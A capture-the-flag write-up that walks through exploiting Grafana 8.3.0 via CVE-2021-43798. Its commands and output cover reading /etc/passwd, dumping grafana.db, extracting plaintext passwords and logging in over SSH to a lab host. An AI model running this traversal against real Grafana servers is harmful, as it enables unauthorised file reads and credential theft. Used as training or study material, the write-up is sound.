N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

Routine - I

Target runs Grafana 8.3.0 + SSH. Path: Grafana path-traversal (CVE-2021-43798) -> dump grafana.db -> extract creds -> SSH for the user flag.

Boot2RootMarkdown + PDFMediumsolved1 minread·201words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/routine-i
archive index
6 / 16
read mode
parsed markdown
Writeup loaded.

Routine - I

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.1.19
category
Boot2Root
points
643
difficulty
Medium
flag format
OWASPKL{xxx}
tools used
nmapcurlstringsegrepsshsshpass
final flag
OWASPKL{496d5373e7501c9aab3b2658bbad4c02}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Target runs Grafana 8.3.0 + SSH. Path: Grafana path-traversal (CVE-2021-43798) -> dump grafana.db -> extract creds -> SSH for the user flag.

2. Initial Reconnaissance

2.1 Port scan + version check

bash2 lines
1nmap -sC -sV -p- -T4 192.168.1.19 -oA routine1_nmap_full2curl -s http://192.168.1.19:3000/api/health
bash3 lines
122/tcp   open  ssh    OpenSSH 10.2p1 Ubuntu 2ubuntu3.223000/tcp open  http   Grafana http3{ "commit": "914fcedb72", "database": "ok", "version": "8.3.0" }
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Path traversal -> /etc/passwd

Grafana 8.3.0 is vulnerable to CVE-2021-43798 (mysql plugin path traversal).

bash2 lines
1curl -s --path-as-is 'http://192.168.1.19:3000/public/plugins/mysql/../../../../../../../../etc/passwd' > etc_passwd_via_traversal.txt2egrep 'tellytubby|kdjebat|yunacat|ratusrempah' etc_passwd_via_traversal.txt
bash4 lines
1yunacat:x:1001:1001::/home/yunacat:/bin/bash2kdjebat:x:1002:1002::/home/kdjebat:/bin/bash3tellytubby:x:1003:1003::/home/tellytubby:/bin/bash4ratusrempah:x:1004:1004::/home/ratusrempah:/bin/bash

3.2 Dump grafana.db and extract creds

bash2 lines
1curl -s --path-as-is 'http://192.168.1.19:3000/public/plugins/mysql/../../../../../../../../var/lib/grafana/grafana.db' -o grafana.db2strings -n 6 grafana.db | egrep -i 'tellytubby|kdjebat|yunacat|ratusrempah|V4lor4nt|Overw4tch|destiny'
bash4 lines
1#%ratusrempahpassword123@!2!3tellytubbyV4lor4nt-Anti-cHEAT3/kdjebatOverw4tch1sgoated4%yunacatdestiny4lyfe
PDF evidence frame 03

4. Exploitation / Recovery

4.1 SSH as tellytubby, locate and read the flag

bash1 lines
1sshpass -p 'V4lor4nt-Anti-cHEAT' ssh -o StrictHostKeyChecking=no tellytubby@192.168.1.19 'id; hostname; find /home/tellytubby -maxdepth 2 -type f 2>/dev/null | egrep -i "local|flag"; ls -la /home/tellytubby/local.txt; cat /home/tellytubby/local.txt'
bash5 lines
1uid=1003(tellytubby) gid=1003(tellytubby) groups=1003(tellytubby)2routine3/home/tellytubby/local.txt4-rw-rw-r-- 1 tellytubby tellytubby 42 May 24 01:13 /home/tellytubby/local.txt5OWASPKL{496d5373e7501c9aab3b2658bbad4c02}

> Re-validated live on 2026-05-31 via Kali (192.168.1.10): tellytubby:V4lor4nt-Anti-cHEAT logged in and returned the flag above.

PDF evidence frame 04

5. Flag

captured flag
OWASPKL{496d5373e7501c9aab3b2658bbad4c02}

6. Summary of Approach & Key Takeaways

nmap found Grafana + SSH; /api/health confirmed 8.3.0.

Used mysql plugin traversal (CVE-2021-43798) to read /etc/passwd.

Dumped /var/lib/grafana/grafana.db via the same traversal.

strings pulled plaintext creds from the DB.

SSH as tellytubby read local.txt.

Always version-fingerprint Grafana; 8.x has a trivial unauthenticated file read.

strings on a SQLite DB often exposes plaintext credentials directly.

PDF evidence frame 05
PDF evidence frame 06
PDF evidence frame 07
PDF evidence frame 08
PDF evidence frame 09